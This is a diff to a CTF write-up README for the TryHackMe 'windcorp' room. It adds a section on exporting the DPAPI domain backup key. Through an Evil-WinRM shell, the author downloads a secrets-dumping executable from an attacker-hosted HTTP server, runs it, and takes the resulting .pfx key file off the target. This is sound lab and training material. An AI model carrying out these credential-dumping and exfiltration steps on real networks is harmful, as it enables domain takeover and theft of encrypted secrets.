zinzloun/THM_WriteUP/windcorp/README.md

     ...

 So being administrator we can get the last flag in C:\users\administrator\desktop.

+## Optional: export DPAPI Domain Backup Key
+### If you want to complite the series, you will need of that key to complete Osiris
+I used the [CQTools suite](https://github.com/BlackDiverX/cqtools/tree/master) to accomplish this task.
+You can find the explanations on how to use these tools [here](https://github.com/BlackDiverX/cqtools/blob/master/bh-asia-2019_arsenal_whitepaper_paula_januszkiewicz_1.1.pdf).
+Here I used CQLsassSecretsDumper.exe

+    *Evil-WinRM* PS C:\Users\buse\Documents> invoke-webrequest http://10.9.1.97:8000/CQLsassSecretsDumper.exe -outfile CQLSD.exe

+And execute it:

+    *Evil-WinRM* PS C:\Users\buse\Documents> .\CQLSD.exe /file ra-dpapi-bk.pfx
+    Prefered key: 07ea03b4-3b28-4270-8862-0bc66dacef1a
+Then download the file

+    *Evil-WinRM* PS C:\Users\buse\Documents> download ra-dpapi-bk.pfx
+    Info: Downloading C:\Users\buse\Documents\ra-dpapi-bk.pfx to ra-dpapi-bk.pfx
+    Info: Download successful!

+Keep the pfx file on your machine, since it will come in handy to solve Osiris!

 ## Remove wine and i386 architecture
 Kill all the process related to Spark client